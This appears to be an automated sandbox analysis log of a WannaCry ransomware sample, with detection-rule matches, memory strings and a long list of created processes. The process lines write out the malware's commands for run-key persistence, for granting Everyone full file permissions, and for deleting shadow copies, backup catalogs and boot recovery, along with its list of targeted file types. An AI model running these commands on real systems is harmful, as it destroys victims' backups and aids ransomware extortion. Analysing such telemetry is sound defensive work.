              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\7551728024260.bat, type: DROPPEDMatched rule: WannCry_BAT date = 2017-05-12, hash1 = f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077, author = Florian Roth, description = Detects WannaCry Ransomware BATCH File, reference = https://goo.gl/HG2j5T, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: C:\Users\user\Desktop\u.wnry, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: C:\Users\user\Desktop\WannaCry.bin, type: DROPPEDMatched rule: WannaCry_Ransomware date = 2017-05-12, hash1 = ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa, author = Florian Roth (with the help of binar.ly), description = Detects WannaCry Ransomware, reference = https://goo.gl/HG2j5T
              Source: C:\Users\user\Desktop\WannaCry.bin, type: DROPPEDMatched rule: wanna_cry_ransomware_generic date = 2017/05/12, hash0 = 4da1f312a214c07143abeeafb695d904, author = us-cert code analysis team, description = detects wannacry ransomware on disk and in virtual page, reference = not set
              Source: C:\Users\user\Desktop\WannaCry.bin, type: DROPPEDMatched rule: Win32_Ransomware_WannaCry tc_detection_name = WannaCry, tc_detection_factor = , author = ReversingLabs, tc_detection_type = Ransomware
              Source: WannaCry.exe, 0000000F.00000003.1474514530.00000000009A8000.00000004.00000020.00020000.00000000.sdmp, WannaCry.exe, 0000000F.00000003.1462016605.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, WannaCry.exe, 0000000F.00000003.1524483850.00000000009C4000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 0000004F.00000000.1576842950.000000000041F000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: A.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docConnecting to server...s.wnry%08X.eky%08X.res00000000.resrb%08X.dky%08X.pkyConnectedSent requestSucceedReceived responseCongratulations! Your payment has been checked!
              Source: WannaCry.exe, 0000000F.00000000.1444934334.000000000040E000.00000008.00000001.01000000.00000008.sdmp, WannaCry.binBinary or memory string: @.der.pfx.key.crt.csr.p12.pem.odt.ott.sxw.stw.uot.3ds.max.3dm.ods.ots.sxc.stc.dif.slk.wb2.odp.otp.sxd.std.uop.odg.otg.sxm.mml.lay.lay6.asc.sqlite3.sqlitedb.sql.accdb.mdb.db.dbf.odb.frm.myd.myi.ibd.mdf.ldf.sln.suo.cs.c.cpp.pas.h.asm.js.cmd.bat.ps1.vbs.vb.pl.dip.dch.sch.brd.jsp.php.asp.rb.java.jar.class.sh.mp3.wav.swf.fla.wmv.mpg.vob.mpeg.asf.avi.mov.mp4.3gp.mkv.3g2.flv.wma.mid.m3u.m4u.djvu.svg.ai.psd.nef.tiff.tif.cgm.raw.gif.png.bmp.jpg.jpeg.vcd.iso.backup.zip.rar.7z.gz.tgz.tar.bak.tbk.bz2.PAQ.ARC.aes.gpg.vmx.vmdk.vdi.sldm.sldx.sti.sxi.602.hwp.snt.onetoc2.dwg.pdf.wk1.wks.123.rtf.csv.txt.vsdx.vsd.edb.eml.msg.ost.pst.potm.potx.ppam.ppsx.ppsm.pps.pot.pptm.pptx.ppt.xltm.xltx.xlc.xlm.xlt.xlw.xlsb.xlsm.xlsx.xls.dotx.dotm.dot.docm.docb.docx.docWANACRY!%s\%sCloseHandleDeleteFileWMoveFileExWMoveFileWReadFileWriteFileCreateFileWkernel32.dll
              Source: classification engineClassification label: mal100.rans.spyw.evad.winZIP@1855/1170@0/8
              Source: C:\Program Files\7-Zip\7zG.exeFile created: C:\Users\user\Desktop\WannaCry.binJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3132:120:WilError_03
              Source: C:\Users\user\Desktop\WannaCry.exeMutant created: \Sessions\1\BaseNamedObjects\MsWinZonesCacheCounterMutexA
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2792:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6000:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3616:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
              Source: C:\Users\user\Desktop\WannaCry.exeMutant created: \Sessions\1\BaseNamedObjects\Global\MsWinZonesCacheCounterMutexA0
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_03
              Source: C:\Users\user\Desktop\WannaCry.exeFile created: C:\Users\All Users\Microsoft\Windows\WER\Temp\~SDF7F9.tmpJump to behavior
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 7551728024260.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
              Source: C:\Windows\SysWOW64\cscript.exeFile read: C:\Users\desktop.ini
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Program Files\7-Zip\7zG.exe "C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\user\Desktop\" -an -ai#7zMap23742:84:7zEvent9207
              Source: unknownProcess created: C:\Users\user\Desktop\WannaCry.exe "C:\Users\user\Desktop\WannaCry.exe"
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +h .
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\icacls.exe icacls . /grant Everyone:F /T /C /Q
              Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppX4325622ft6437f3xfywcfxgbedfvpn0x.mca
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\System32\backgroundTaskHost.exe "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:CortanaUI.AppX3bn25b6f886wmg6twh46972vprk9tnbf.mca
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 7551728024260.bat
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe //nologo m.vbs
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe co
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c start /b @WanaDecryptor@.exe vs
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe vs
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "hdahtimfel691" /t REG_SZ /d "\"C:\Users\user\Desktop\tasksche.exe\"" /f
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Windows\System32\consent.exe consent.exe 6008 686 000002152F62E5C0
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic shadowcopy delete
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\@WanaDecryptor@.exeProcess created: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exe TaskData\Tor\taskhsvc.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\TaskData\Tor\taskhsvc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\taskdl.exe taskdl.exe
              Source: C:\Users\user\Desktop\WannaCry.exeProcess created: C:\Users\user\Desktop\@WanaDecryptor@.exe @WanaDecryptor@.exe
